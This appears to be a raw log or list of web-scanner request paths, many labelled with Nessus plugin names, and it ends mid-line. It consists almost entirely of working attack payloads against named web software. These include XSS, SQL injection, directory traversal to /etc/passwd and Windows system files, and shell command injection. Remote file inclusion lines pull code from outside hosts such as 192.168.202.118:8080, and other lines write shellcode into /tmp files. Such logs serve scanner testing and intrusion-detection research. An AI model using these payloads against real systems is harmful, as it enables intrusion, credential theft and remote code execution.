src=\"javascript:alert(cross_site_scripting.nasl);\">\n/top.php?stuff=\"\\x0ddel\\x09q29444369\\x09#\n/<a_href=\"http://www/\n/scripts/wd7crx47eaml.cgi\n/<script>cross_site_scripting.nasl</script>.mscgi\n/javascript/lg.exe\n/examples/jsp/jsp2/el/tinybrowser/upload.php?badfiles=1><script>alert('tinybrowser_multiple_xss.nasl')</script>\n/templates/tmpl_dfl/scripts/index.php?dir[inc]=http://192.168.202.118:8080/moclyxlwqyfjnp?\n/scripts/gitweb.cgi\n/cgi.cgi/a1stats/a1disp4.cgi?../../../../../../../etc/passwd\n/3j8echh0.exe?<script>document.cookie=\"testfuqi=4189;\"</script>\n/top.php?stuff=\"uname\\x09>q22258799\\x09#\n/0z575z74.cgi?<meta http-equiv=set-cookie content=\"testuhsv=9753\">\n/cgi-exe/webcart/webcart.cgi?change=yes&code=phold&config=mountain&nextpage=;cat /etc/passwd|\n/main.php?stuff=;\n/help.php?q=\"ver;>q24461998&rem;\n/606wkcop.exe?<script>cross_site_scripting.nasl</script>\n/azcrfs8d.x?<meta http-equiv=set-cookie content=\"testjpdr=9205\">\n/6dlc2zm9.idc?<script>document.cookie=\"testqpux=4016;\"</script>\n/examples/jsp/sessions/index2.cgi?frames=yes&board=demo&mode=current&threads=collapse&message=../../../../../../../../../../etc/passwd\\x00\n/en-us/w4996nr0.jspa?<meta http-equiv=set-cookie content=\"testttvs=7163\">\n/zln2hm2z.do?<meta http-equiv=set-cookie content=\"testblcp=8120\">\n/cgi-bin/starnet/addons/slideshow_full.php?album_name='1162802868\n/recordings/athenareg.php?pass= ;id\n/scripting_examples/\n/scripts/piywzua5hwer.php\n/clk;23426417;7163019;d/\n/scripts/zdbyw3dn3gh2.sh\n/scripts/index.php?id=_pb9wansu9'\n/index.php?x=browse&category='union select '1','2','pixelpost_category_sql_injection.nasl','1331919219','5'--\n/mostlyce/jscripts/tiny_mce/plugins/htmltemplate/htmltemplate.php?mosconfig_absolute_path=http://192.168.202.118:8080/tzhfyzkbomspvm?\n/applescript-users/\n/awstats/awstats.pl?migrate=|echo;/bin/echo -en \"\\0367\\0322\\0041\\03201\\0311qqj\\0042j\\0007pq\\0211\\0343\" >> /tmp/yzicxmyifv0;echo|awstats435994.txt\n/flashxss/\n/help.php?q=\"|sleep\\x098\\x09#\n/nyjgaorz.php?<script>cross_site_scripting.nasl</script>\n/preview.php?php_script_path=http://192.168.202.118:8080/zz5thkvtmlgl??&cmd=dir\n/scripts/mail.php?id='/**/union/**/select/**/1,2,1331904464,4--&blog=1\n/main.php?stuff=\"&ping\\xa0-w\\xa09000\\xa0-n\\xa01\\xa01.2.3.4&rem\\xa0\n/javascript/e.exe\n/ht8pn8uq.do?<img src=\"javascript:alert(cross_site_scripting.nasl);\">\n/en-us/hipkz026.nsf?<script>document.cookie=\"testyrbs=2855;\"</script>\n/careerdescription/\n/javascript/felix.exe\n/main.php?logout='\\x0dsleep 10 #\n/5qnlm5z2.fts?<meta http-equiv=set-cookie content=\"testsixi=8451\">\n/scripts/wikka.php?wakka=homepage/../../actions/wikkachanges\n/examples/jsp/cal/btdownload.php?type=torrent&file=../../../../../../../../../../etc/passwd\n/help.php?q=\";sleep\\x098\\x09#\n/cgi-sys/ion-p.exe?page=c:\\winnt\\repair\\sam\n/7dbjwpw6.dll?<script>cross_site_scripting.nasl</script>\n/scripts/register.asp\n/<img src=\"javascript:alert(cross_site_scripting.nasl);\">.fts\n/examples/jsp/checkbox/lib/dbman_filter.inc.php?lib_path=/etc/passwd\\x00\n/scripts/fpadmcgi.exe\n/examples/servlets/servlet/c32web.exe/getimage?imagename=cart32.ini\\x00.gif\n/scripts/vhost.php?action=logout&time=1331904947\n/_mem_bin/..\\xc0%9v..\\xc0%9v..\\xc0%9v..\\xc0%9v..\\xc0%9v../winnt/system32/cmd.exe?/c+dir+c:\\+/og\n/javascript/in.exe\n/169okeyj.htm?<script>document.cookie=\"testxeoi=3573;\"</script>\n/fnwhrxyd.php?<script>cross_site_scripting.nasl</script>\n/9ko6m4c8.cfm?<meta http-equiv=set-cookie content=\"testylik=3403\">\n/cgi-bin/admin/admin.php?sid=0'\n/top.php?stuff='\\x0duname >q83658658 #\n/lmw4r201.asp?<script>document.cookie=\"testwews=8477;\"</script>\n/if69ddo1.htm?<script>document.cookie=\"testiabz=5220;\"</script>\n/en-us/7o5qp766.jspa?<img src=\"javascript:alert(cross_site_scripting.nasl);\">\n/examples/jsp/jsp2/jspx/index.php?gadget=glossary&action=viewterm&term=<script>alert('jaws_xss.nasl');</script>\n/bl8sefdm.htm?<img src=\"javascript:alert(cross_site_scripting.nasl);\">\n/examples/jsp/cal/mrtg.cgi?cfg=/../../../../../../../../../etc/passwd\n/t578vqea.idc?<meta http-equiv=set-cookie content=\"testsory=7676\">\n/scripts/index.php?op=viewalbum&albumid=-1/**/union/**/select/**/0,1,266652800,1186686792,1,1,1,1,1--&blogid=1\n/scripts/index.php?edit=nonexistant1325605090\n/help.php?q=\"&ver,>q45293431&rem,\n/qb2xy9aw.idc?<script>cross_site_scripting.nasl</script>\n/main.php?stuff=\"&rm q44697755 #\n/main.php?stuff=ping;-w;8000;-n;1;4.3.2.1|rem;\n/main.php?stuff='sleep\\x099\\x09#\n/hjdzm96v.x?<script>document.cookie=\"testbyqe=7474;\"</script>\n/iktok2bw.aspx?<script>cross_site_scripting.nasl</script>\n/help.php?q=ver >q22489699&rem \n/conscription/\n/top.php?stuff=\"sleep 9 #\n/odzk29aa.do?<script>document.cookie=\"testtfvh=2141;\"</script>\n/zabbix/frontends/php/locales.php?download=1&langto=1&extlang[\".system('chmod+777+/tmp/fhhqvtjwvv.sh').\"]=1\n/scripts/event_view.php?eid=34 union select 294969347\n/examples/servlets/servlet/includes/db_adodb.php?basedir=/etc/passwd\\x00\n/main.php?stuff=\"&ver;>q41942739&rem;\n/en-us/dda2qr7j.mscgi?<img src=\"javascript:alert(cross_site_scripting.nasl);\">\n/bmeun223.pl?<meta http-equiv=set-cookie content=\"testhhwu=7044\">\n/vjbrrppi.html?<img src=\"javascript:alert(cross_site_scripting.nasl);\">\n/cgi/view_item?html_file=../../../../../../../../../../etc/passwd\\x00\n/um7xpn15.aspx?<script>document.cookie=\"testotoy=6142;\"</script>\n/top.php?stuff='\\x0auname #\n/help.php?q=\"ver\\x0c>q49751234&rem\\x0c\n/top.php?stuff='&del q28696513 #\n/examples/jsp/jsp2/el/ttawebtop.cgi/?action=start&pg=../../../../../../../../../../../etc/passwd\n/main.php?logout=;rm q18667266 #\n/examples/jsp/jsp2/el/admin/admin.php?sid='\n/addvip.php?msetstr[\"progsdir\"]=http://192.168.202.96:8080/vir0v3xfc?\n/php-scripts/\n/jhot.php?rev=2 |less /etc/passwd\n/examples/jsp/jsp2/jspx/demos/demo.browse.php?filename=/etc/passwd\n/classes/adodbt/sql.php?classes_dir=/etc/passwd\\x00\n/catalog_products_with_images.php/\"><script>alert(414615599126)</script><\"\n/examples/jsp/colors/search.php?allwords=<br><script>foo</script>&cid=0&title=1&desc=1\n/eg2u8pbv.pl?<img src=\"javascript:alert(cross_site_scripting.nasl);\">\n/script/index.php?path_inc=http://192.168.202.118:8080/moclyxlwqyfjnp?\n/examples/jsp/error/includes/third_party/adodb/server.php?sql='adodb_sql_sql_injection.nasl\n/prescription_program/\n/rpxyx07v.nsf?<script>document.cookie=\"testbnli=1975;\"</script>\n/main.php?stuff=\\x0duname\\x09>q15158392\\x09#\n/scripts/w3who.dll\n/javascript/items.exe\n/manager/webplus.exe?script=webplus_install_path.nasl\n/examples/jsp/jsp2/jspx/contenido/classes/class.inuse.php?cfg[path][contenido]=/etc/passwd\\x00\n/scripts/upgrade/index.php\n/g8nu2yy7.cfm?<script>cross_site_scripting.nasl</script>\n/d765w06j.asp?<img src=\"javascript:alert(cross_site_scripting.nasl);\">\n/examples/jsp/checkbox/autohtml.php?op=modload&mailfile=x&name=../../../../../../../../etc/passwd\n/administrator/components/com_feederator/includes/tmsp/subscription.php?globals[mosconfig_absolute_path]=http://192.168.202.96:8080/no4ghqiguzhst?\n/fcgi-bin/nph-showlogs.pl?files=../../&filter=.*&linecnt=500&refresh=0&submit=go\n/javascript/cl.exe\n/cgi-bin/environ.pl?param1=<script>alert(document.cookie)</script>\n/scripts/contact.php\n/help.php?q='\\x0drm q75815481 #\n/en-us/i686v90l.do?<script>document.cookie=\"testfutf=1550;\"</script>\n/search.php?submit=true&search=');\n/rbec2ohx.asp?<img src=\"javascript:alert(cross_site_scripting.nasl);\">\n/a0imiuf1.fts?<meta http-equiv=set-cookie content=\"testxqrn=4654\">\n/help.php?q=\"&ping,-w,10000,-n,1,4.3.2.1&rem,\n/scripts/atomicboard/index.php?location=../../../../../../../../../../../../../../../etc/passwd\n/jnv890lt.cfm?<script>cross_site_scripting.nasl</script>\n/examples/jsp/colors/mail.php?id='/**/union/**/select/**/1,2,1331904464,4--&blog=1\n/o1zj4u9v.pl?<script>document.cookie=\"testabrn=6368;\"</script>\n/javascript/job.exe\n/examples/jsp/error/googlesearch/googlesearch.php?app[path][lib]=/etc/passwd\\x00\n/money.exe\n/en-us/h5sc3gxy.php3?<img src=\"javascript:alert(cross_site_scripting.nasl);\">\n/ows-bin/testcgi.exe\n/sdk/../../../../../../../../../../../../../etc/passwd\n/examples/jsp/jsp2/el/search/search.cgi?keys=*&prc=any&catigory=../../../../../../../../../../../../etc\n/help.php?q=\"&ver\\x09>q98836719&rem\\x09\n/scripts/forum_2.php?msg=10&return=<script>foo</script>\n/examples/jsp/jsp2/jspx/mail.php?id='/**/union/**/select/**/1,2,1331904464,4--&blog=1\n/main.php?logout=\"&rm,q76194966&rem,\n/manager/config.php?returnpath=/etc/passwd\\x00\n/scripts/ggvfa_wichxq.cfm\n<script>document.cookie=\"testgfjr=1286;\"</script>\n/m4kkjf8l.htm?<script>document.cookie=\"testyglc=8988;\"</script>\n/xsqln7eb.mscgi?<script>document.cookie=\"testpcbb=9254;\"</script>\n/?<script>document.cookie=\"testpcbb=9254;\"</script>\n/examples/jsp/jsp2/jspx/download.php?language=/etc/passwd\\x00\n/eet_subscription/\n/phpmyadmin//..0x5c..0x5c..0x5c..0x5c..0x5c..0x5c..0x5c..0x5cetc/passwd\n/d765w06j.mscgi?<img src=\"javascript:alert(cross_site_scripting.nasl);\">\n/d765w06j.php?<script>cross_site_scripting.nasl</script>\n/static//..\\xc0\\xaf..\\xc0\\xaf..\\xc0\\xaf..\\xc0\\xaf..\\xc0\\xaf..\\xc0\\xaf..\\xc0\\xaf..\\xc0\\xafwindows/win.ini\n/cross-site_scripting/\n/phpmyadmin/search.cgi?..\\..\\..\\..\\..\\..\\windows\\win.ini\n/javascript/viewsource.exe\n/g8nu2yy7.exe?<script>cross_site_scripting.nasl</script>\n/<script>document.cookie=\"testxqrn=4654;\"</script>\n/recordings/main.php?g2_view=zipcart.download&g2_file=../../../../../../../../../../../../etc/passwd\n/search.php?config[\"sipssys\"]=http://192.168.202.118:8080/moclyxlwqyfjnp?\n/6n7aacgg.nsf?<img src=\"javascript:alert(cross_site_scripting.nasl);\">\n/h5i6crm3.kspx?<meta http-equiv=set-cookie content=\"testlihk=7070\">\n/cgi-bin/index.php?id='union/**/select/**/0,0,422787269,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0--\n/manager/notify?from=nessus\"|id\"\n/fc9t54l7.cfm?<meta http-equiv=set-cookie content=\"testggad=2000\">\n/vac1l5vm.fts?<script>cross_site_scripting.nasl</script>\n/o6ebbirj.fts?<script>cross_site_scripting.nasl</script>\n/edv3mapy.x?<script>cross_site_scripting.nasl</script>\n/r3le3om5.cfm?<img src=\"javascript:alert(cross_site_scripting.nasl);\">\n/scripts/9pen4xzgztjn.html\n/javascript/problems.exe\n/examples/jsp/num/server.pt?open=space&name=\";}</script><script>alert('plumtree_name_xss.nasl')</script>\n/vjbrrppi.x?<img src=\"javascript:alert(cross_site_scripting.nasl);\">\n/description des travaux entrepris pour la construction de la tonnelle ou passage sous la tamise/\n/j2kdmfw4.nsf?<img src=\"javascript:alert(cross_site_scripting.nasl);\">\n/xlj7h65o.x?<script>document.cookie=\"testtbbe=856;\"</script>\n/t3af3tdz.idc?<script>cross_site_scripting.nasl</script>\n/scripts/sitemap.scr.php?globals[pth][classes]=http://192.168.202.118:8080/moclyxlwqyfjnp?\n/edzaia0i.jspa?<script>cross_site_scripting.nasl</script>\n/top.php?stuff=';del\\x09q48683432\\x09#\n/rpxyx07v.php3?<script>document.cookie=\"testbnli=1975;\"</script>\n/main.php?stuff=\"&rm\\x0cq64367569&rem\\x0c\n/main.php?stuff=ping;-w;10000;-n;1;4.3.2.1&rem;\n/main.php?stuff='sleep\\x0910\\x09#\n/manager/home?dir=/&file=../../../../../../../../../../../../etc/passwd&lang=kor\n/examples/jsp/cal/dsweb/services/user-1\"><body onload=alert('xerox_docushare_dsweb_xss.nasl')>\n/zml.cgi?file=../../../../../../../../../../../../etc/passwd\\x00\n/en-us/jnv890lt.idc?<script>cross_site_scripting.nasl</script>\n/n1afe1y6.php3?<img src=\"javascript:alert(cross_site_scripting.nasl);\">\n/cacti/webplus.exe?script=webplus_install_path.nasl\n/cgi-bin/csnewspro.cgi?command=savesetup&setup=;system('cat /etc/passwd')\n<script>document.cookie=\"testdnbh=5237;\"</script>\n/index.php?lng=../system_footer&sensor_program=phpsysinfo_241.nasl\n/javascript/novell.exe\n/examples/jsp/colors/pollit/poll_it_ssi_v2.0.cgi?data_dir=/etc/passwd\\x00\n/opensiteadmin/scripts/classes/formmanager.php?path=http://192.168.202.118:8080/iroy1gvqrrqu?\\x00\n/scripts/fake.cgi?arg=/../../../../../windows/win.ini\n/javascript/vote.exe\n/help.php?q=\"ping\\x0b-w\\x0b8000\\x0b-n\\x0b1\\x0b1.2.3.4&rem\\x0b\n/cgi-bin/index.php?x=browse&category='union select '1','2','pixelpost_category_sql_injection.nasl','1331905220','5'--\n/exchange/..\\xe0\\x80\\xaf..\\xe0\\x80\\xaf..\\xe0\\x80\\xaf..\\xe0\\x80\\xaf..\\xe0\\x80\\xaf../winnt/system32/cmd.exe?/c+dir+c:\\+/og\n/examples/jsp/checkboxfaq.php?skin=../../admin/manager&tplpath=admin\n/phpmyadmin//..\\xc1\\x9c..\\xc1\\x9c..\\xc1\\x9c..\\xc1\\x9c..\\xc1\\x9c..\\xc1\\x9c..\\xc1\\x9c..\\xc1\\x9c/etc/passwd\n/rv98iwjp.nsf?<img src=\"javascript:alert(cross_site_scripting.nasl);\">\n/main.php?logout='|sleep\\x099\\x09#\n/scripts/inc/exif.inc.php?exif_prog=(echo -n 'original_exif_prog_cmd_exec.nasl: ';id)||echo\n/phpmyadmin/admin/index.php?act=login&username=' union select 1,'pafaq_10b4.nasl','5e0bd03bec244039678f2b955a2595aa','',0,'',''--&password=nessus\n/javascript/siteserver.exe\n/examples/jsp/error/session/login.php?dest=nessus\"><script>alert('ossim_dest_xss.nasl')</script><!-- \n/examples/jsp/error/index.php?sensor_program=<script>alert('phpsysinfo_multiple_xss.nasl');</script>\n/examples/jsp/error/common/visiteurs/include/menus.inc.php?lvc_include_dir=/etc/passwd\\x00\n/en-us/account/upgrade/index.php?steporder[]=../../../../../../../../../../../../etc/passwd\\x00\n/scripts/edit.jsp?page=user&editor=../../../install\n/w4996nr0.aspx?<meta http-equiv=set-cookie content=\"testttvs=7163\">\n/help.php?q=\"ver&rem\\x0b\n/en-us/odzk29aa.htm?<script>document.cookie=\"testtfvh=2141;\"</script>\n/nmw0do67.mscgi?<script>cross_site_scripting.nasl</script>\n/j4drbkil.cfm?<img src=\"javascript:alert(cross_site_scripting.nasl);\">\n/cgi-bin/index.php?id=yfbenmzg_m'\n/main.php?logout='del q44999749 #\n/l752x1ry.php?<img src=\"javascript:alert(cross_site_scripting.nasl);\">\n/recordings/insertorder.cfm?cfid=1&cftoken=1 union select 1,2,3,4,storename,6,7,8,9,10,11,12,13,14,15 from params\"having 1=1\n/forum-ra_professionnel.asp?n=/../../../etc/passwd\n/scripts/qop0sa1auif9.shtml\n/examples/jsp/colors/ion-p.exe?page=c:\\\\winnt\\\\win.ini\n/cgi/ion-p.exe?page=c:\\winnt\\repair\\sam\n/ju0u7kfo.html?<script>cross_site_scripting.nasl</script>\n/manager/html;jsessionid=6d7dcff06f1d6b94440bd9872d83b1a0?org.apache.catalina.filters.csrf_nonce=5b74a2812f1d27f94819ac50e785991b\n/main.php?logout=\"&ver >q63418787&rem \n/javascript/error.exe\n/pirvate/ltwpdfmonth.php?ltw_config['include_dir]=http://192.168.202.118:8080/2aibfaczmac8?\n/report.php?scriptpath=http://192.168.202.118:8080/moclyxlwqyfjnp??\n/scripts/tomcat_proxy_directory_traversal.nasl1331922018\n/main.php?logout=1:<iframe src=\"http://www.aol.com\">\n/j734qobz.exe?<script>cross_site_scripting.nasl</script>\n/examples/jsp/cal/index.php?id=urjhxcl19w'\n/main.php?logout=\"del\\x0cq35989384&rem\\x0c\n/main.php?stuff=\"|ping -w 9000 -n 1 1.2.3.4|rem \n/help.php?q=\"&del;q51857139&rem;\n/examples/jsp/sessions/include/sql.php?include_path=/etc/passwd\\x00\n/help.php?q=\";del\\x09q51344488\\x09#\n/scripts/cdjnwtwnqga1.html\n/help.php?q=\"sleep\\x0910\\x09#\n/miz4r5hz.php3?<meta http-equiv=set-cookie content=\"testviqu=1270\">\n/lmw4r201.fts?<meta http-equiv=set-cookie content=\"testwews=8477\">\n/scripts/vvh_tajyleqq.html\n/cgi-bin/phprint.php?module=vtiger_lang_crm_lfi.nasl&action=1331923189&lang_crm=../../../../../../../../../../../..//etc/passwd\\x00\n/scs86g1p.nsf?<script>document.cookie=\"testquyx=2820;\"</script>\n/ghswfouu.mscgi?<meta http-equiv=set-cookie content=\"testsqmm=5713\">\n/examples/jsp/cal/index.php?search='><script>alert('autoindex_search_xss.nasl');</script>&searchmode=f\n/javascript/at.exe\n/h4bi26jd.pl?<script>document.cookie=\"testhrzx=1150;\"</script>\n/examples/jsp/error/download.php?language=/etc/passwd\\x00\n/scripts/iisadmin/bdir.htr\n/scs86g1p.fts?<meta http-equiv=set-cookie content=\"testquyx=2820\">\n/cgi-bin/index.php?id='union/**/select/**/0,0,1780794214,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0--\n/examples/jsp/error/al_initialize.php?alpath=/etc/passwd\\x00\n/examples/jsp/jsp2/jspx/bb_func_txt.php?pathtofiles=/etc/passwd\\x00\n/scripts/cssearch.cgi?command=savesetup&setup=print `id`\n/javascript/abcd1234.exe\n/scripts/include/doc/get_image.php?lang=en&img=../../../../../../../../../../etc/passwd\n/en-us/ddoworrl.asp?<meta http-equiv=set-cookie content=\"testvlau=8517\">\n/javascript/showenv.exe\n/javascript/.passwd.manifest\n/examples/jsp/colors/www/delivery/ac.php?bannerid=-1331904367+or+1=1+--+';passthru(base64_decode($_server[http_nessus__zozllvj]));die;/*\n/x2gyorli.aspx?<script>document.cookie=\"testwhac=3130;\"</script>\n/drhcprxk.exe\n/main.php?stuff=';sleep 9 #\n/manager/www/delivery/ac.php?bannerid=-1331904367+or+1=1+--+';passthru(base64_decode($_server[http_nessus_uhkmnhw4]));die;/*\n/m2fpztty.aspx?<script>cross_site_scripting.nasl</script>\n/help.php?q=\\\\'\n/faq.php?action=&type=view&s=&id=-1' union select 0,1279798921,0,0,0,0,0--\n/phpmyadmin//./../../../../../../../.etc/passwd\n/htbin/ppdscgi.exe\n/gvx7m5ti.fts?<script>document.cookie=\"testwldz=3506;\"</script>\n/cacti/index.php?configfile=../../../../../../../../../etc/passwd\n/b1q8bywu.jspa?<script>cross_site_scripting.nasl</script>\n/scripts/ppdscgi.exe\n/examples/jsp/jsp2/el/ncbook.cgi?action=default&current=|cat /etc/passwd|&form_tid=996604045&prev=main.html&list_message_index=10\n/moodle/filter/tex/texed.php?formdata=foo&pathname=foo\"+||+echo+db+8b+ec+50+60+6a+04+5a+50+8b+dc+e8+41+00+00+00+6a+00+68+6c+6c+6f+63+68+75+61++>>esbq\n/cgi-bin/jgs_portal_statistik.php?meinaction=themen&month=1&year=1'\n/x2gyorli.pl?<meta http-equiv=set-cookie content=\"testwhac=3130\">\n/scripts/search.jsp?q=%\"<script>alert(1331904189)</script>\n/phpmyadmin/smpwservicescgi.exe\n/v3axg1p8.do?<script>document.cookie=\"testxagh=6987;\"</script>\n/scripts/ftp/ftp.pl?dir=../../../../../../etc\n/scripts/zdbyw3dn3gh2.cgi\n/examples/servlets/servlet/ftp/ftp.pl?dir=../../../../../../etc\n/quagynka.pl?<img src=\"javascript:alert(cross_site_scripting.nasl);\">\n/opensiteadmin/scripts/classes/form.php?path=http://192.168.202.118:8080/moclyxlwqyfjnp?\\x00\n/top.php?stuff=\"ping\\x0c-w\\x0c9000\\x0c-n\\x0c1\\x0c4.3.2.1&rem\\x0c\n/en-us/account/yabb.pl?board=news&action=display&num=../../../../../../etc/passwd\\x00\n/cgi-914/fileseek.cgi?foot=&head=....//....//....//....//....//....//....//etc/passwd\n/\\xd0\\xa1\\xd1\\x96\\xd0\\xbc'\\xd1\\x8f/\n/cgi-bin/index.php?module=topics&func=view&topicid=-1 union select null,null,'mdpro_topicid_sql_injection.nasl-1331904216',null,null,null,null --\n/inetisscripts/\n/examples/jsp/jsp2/jspx/index2.cgi?frames=yes&board=demo&mode=current&threads=collapse&message=../../../../../../../../../../etc/passwd\\x00\n/l752x1ry.mscgi?<script>cross_site_scripting.nasl</script>\n/main.php?logout=\"|ping\\x0b-w\\x0b11000\\x0b-n\\x0b1\\x0b1.2.3.4|rem\\x0b\n/javascript/opinion.exe\n/hipkz026.asp?<script>document.cookie=\"testyrbs=2855;\"</script>\n/scripts/shop.plx/page=nessus1153151319\n/xoops232b/htdocs/xoops_lib/modules/protector/onupdate.php?mydirname=a(){}system('chmod+777+/tmp/cexxamcdtz.sh'); function v\n/top.php?stuff='del\\x09q54162214\\x09#\n/uc3w3bdi.mscgi?<script>document.cookie=\"testxllt=9940;\"</script>\n/help.php?q=\"ping -w 10000 -n 1 4.3.2.1|rem \n/p043snfr.asp?<img src=\"javascript:alert(cross_site_scripting.nasl);\">\n/cacti/carbo.dll?icatcommand=..\\..\\..\\..\\..\\..\\winnt\\win.ini&catalogname=catalog\n/help.php?q=\"rm,q58627156&rem,\n/scripts/tst.bat|type c:\\windows\\win.ini\n/7uz3ok60.php?<script>cross_site_scripting.nasl</script>\n/help.php?q=&ver\\x0b>q17815464&rem\\x0b\n/r3le3om5.php3?<script>cross_site_scripting.nasl</script>\n/cgi/fileseek2.cgi?foot=&head=....//....//....//....//....//....//....//etc/passwd\n/javascript/entertainment.exe\n/examples/jsp/error/index.php?x=browse&category='union select '1','2','pixelpost_category_sql_injection.nasl','1331904458','5'--\n/en-us/33y9gcqq.aspx?<script>document.cookie=\"testnvxc=4301;\"</script>\n/iajtej82.asp?<script>cross_site_scripting.nasl</script>\n/examples/jsp/cal/usrdetails.php?sgnuptype=csaleid<script>nessus</script>\n/securecgi-bin/csusercgi.exe?ver\n<script>document.cookie=\"testwtbo=4831;\"</script>\n/t578vqea.nsf?<script>document.cookie=\"testsory=7676;\"</script>\n/examples/jsp/num/dcforum.cgi?az=list&forum=../../../../../../../etc/passwd\\x00\n/examples/jsp/colorsmultihtml.pl?multi=/etc/passwd\\x00html\n/scs86g1p.php3?<meta http-equiv=set-cookie content=\"testquyx=2820\">\n/top.php?stuff=|ping;-w;9000;-n;1;1.2.3.4|rem;\n/main.php?stuff=&uname\\x09>q79293512\\x09#\n/eg2u8pbv.php3?<script>cross_site_scripting.nasl</script>\n/cgi-bin/dataservice.asmx/authuser?username='nessus1331908868&password=nasl&needcompress=0\n/en-us/account/index.php?module=<script>foo</script>\n/6dlc2zm9.jspa?<script>document.cookie=\"testqpux=4016;\"</script>\n/main.php?frm_daynight=day&frm_passwd=&frm_referer=http%3a//192.168.23.202/main.php%3fstuff%3d2040844887&frm_user=&scr_height=q36858512&scr_width=\n/examples/jsp/cal/mapserv.exe?map=mapserver_detect.nasl.map\n/cgi-bin/index.php?op=default&date=200607' union select 1,1126595310,1,1,1,1,1,1,1,1--&blogid=1\n/zabbix/frontends/php/locales.php?download=1&langto=1&extlang[\".system('/./tmp/hwmxmkxsji0+>+/dev/null+&').\"]=1\n/82q7ywa8.cfm?<script>document.cookie=\"testpwew=1315;\"</script>\n/3m5knyc4.mscgi?<meta http-equiv=set-cookie content=\"testbgqj=6434\">\n/htbin/query?mss=../config\n/diazepam_prescription/\n/examples/jsp/error/main.php?g2_itemid=../../../../../license\\x00\n/azcrfs8d.pl?<script>document.cookie=\"testjpdr=9205;\"</script>\n/examples/jsp/checkbox/library/adodb/server.php?sql='adodb_sql_sql_injection.nasl\n/scripts/_xuzlr7swn95.asp\n/cgi-bin/phprint.php?module=vtiger_lang_crm_lfi.nasl&action=1331904220&lang_crm=../../vtigerservice.php\\x00\n/help.php?q=\"uname\\x09>q26563628\\x09#\n/bn857frh.mscgi?<img src=\"javascript:alert(cross_site_scripting.nasl);\">\n/vjbrrppi.dll?<script>cross_site_scripting.nasl</script>\n/lsoix5h3.x?<img src=\"javascript:alert(cross_site_scripting.nasl);\">\n/iajtej82.pl?<script>cross_site_scripting.nasl</script>\n/webcgi/query?mss=../config\n/index.php?album=<script>alert(413996083537)</script>\n/main.php?logout=';del q59144751 #\n/fcgi-bin/c32web.exe/changeadminpassword\n/examples/jsp/colors/evb/check_url.php?url=pligg_url_sql_injection.nasl' union select 1331904454,472430861 -- \n/manager/demos/demo.browse.php?filename=/etc/passwd\n/examples/servlets/servlet/lib/dbman_filter.inc.php?lib_path=/etc/passwd\\x00\n/en-us/odzk29aa.html?<script>document.cookie=\"testtfvh=2141;\"</script>\n/search.jsp?q=%\"<script>alert(1331923191)</script>\n/main.php?stuff=\"\\x0duname >q98657175 #\n/examples/servlets/servlet/menu_dx.php?site_path=../../../../../../../../../../etc/passwd\\x00\n/help.php?q=\"del q65533214&rem \n/examples/jsp/jsp2/el/awstatstotals.php?sort={${phpinfo()}}{${exit()}}\n/bl8sefdm.exe?<img src=\"javascript:alert(cross_site_scripting.nasl);\">\n/examples/jsp/checkbox/lib/adodb/server.php?sql='adodb_sql_sql_injection.nasl\n/bmeun223.fts?<meta http-equiv=set-cookie content=\"testhhwu=7044\">\n/main.php?stuff=\"|ping\\x0c-w\\x0c9000\\x0c-n\\x0c1\\x0c4.3.2.1|rem\\x0c\n/main.php?stuff=;del q23784271 #\n/top.php?stuff='\\x0dsleep\\x097\\x09#\n/ywaxntrx.jsp?<img src=\"javascript:alert(cross_site_scripting.nasl);\">\n/javascript/free.exe\n/ghswfouu.dll?<script>document.cookie=\"testsqmm=5713;\"</script>\n/cacti/logbook.pl?file=../../../../../../../../../../bin/cat /etc/passwd\\x00|\n/ovcgi/jovgraph.exe\n/scripts/news.scr.php?globals[pth][classes]=http://cirt.net/rfiinc.txt??\n/static//../../../../../../../../etc/passwd\\x00en\n/javascript/columns.exe\n/top.php?stuff='\\x0dsleep 11 #\n/scripts/app_and_readme/navigator/index.php?page=http://192.168.202.118:8080/iroy1gvqrrqu?\n/examples/servlets/servlet/index.pl/homels?func=add;class=webgui::asset::wobject::article;print `id`;\n/zln2hm2z.idc?<script>document.cookie=\"testblcp=8120;\"</script>\n/opensiteadmin/scripts/classes/filters/singlefilter.php?path=http://192.168.202.96:8080/ipb5ri?\\x00\n/manager/survey.inc.php?path=/etc/passwd\\x00\n/d765w06j.nsf?<script>cross_site_scripting.nasl</script>\n/welcome.php?custom_welcome_page=/etc/passwd\\x00\n/top.php?stuff=\"|ping,-w,9000,-n,1,1.2.3.4|rem,\n/postscript/\n/p043snfr.cfm?<img src=\"javascript:alert(cross_site_scripting.nasl);\">\n/examples/jsp/error/profil.php?id=1 <script>foo</script>\n/examples/jsp/cal/zml.cgi?file=../../../../../../../../../../../../etc/passwd\\x00\n/moodle/filter/tex/texed.php?formdata=foo&pathname=foo\"+||+echo+f+0+1a00+0+>>esbq\n/top.php?stuff=&uname\\x09>q93182821\\x09#\n/javascript/qotd.exe\n/examples/jsp/jsp2/el/search.php?allwords=<br><script>foo</script>&cid=0&title=1&desc=1\n/en-us/9kr0ih0v.html?<script>document.cookie=\"testzgnm=1183;\"</script>\n/examples/jsp/cal/phpnews/sendtofriend.php?mid='1'\n/3m5knyc4.kspx?<script>document.cookie=\"testbgqj=6434;\"</script>\n/examples/jsp/jsp2/jspx/mlog.html?screen=/etc/passwd\n/cgi-914/webcart/webcart.cgi?change=yes&code=phold&config=mountain&nextpage=;cat /etc/passwd|\n/help.php?q='\\x0arm\\x09q87897781\\x09#\n/photonet-subscriptions/\n/news/include/createdb.php?langfile;=http://192.168.202.118:8080/zz5thkvtmlgl??\n/nyjgaorz.x?<script>cross_site_scripting.nasl</script>\n/help.php?q=\"\\x0auname\\x09>q45619595\\x09#\n/o4194527.exe/\n/en-us/account/store.cgi?startid=../../../../../../../../../etc/passwd\\x00.html\n/newsblastsubscription/\n/scripts/d3z7yywpyeoa.cgi\n/zqqemp6j.html?<img src=\"javascript:alert(cross_site_scripting.nasl);\">\n/ao22ww7y.idc?<script>document.cookie=\"testqppc=8767;\"</script>\n/recordings/www/delivery/ac.php?bannerid=-1331918977+or+1=1+--+';passthru(base64_decode($_server[http_nessus_mlv7_r6z]));die;/*\n/cgi-exe/fileseek.cgi?foot=&head=;cat 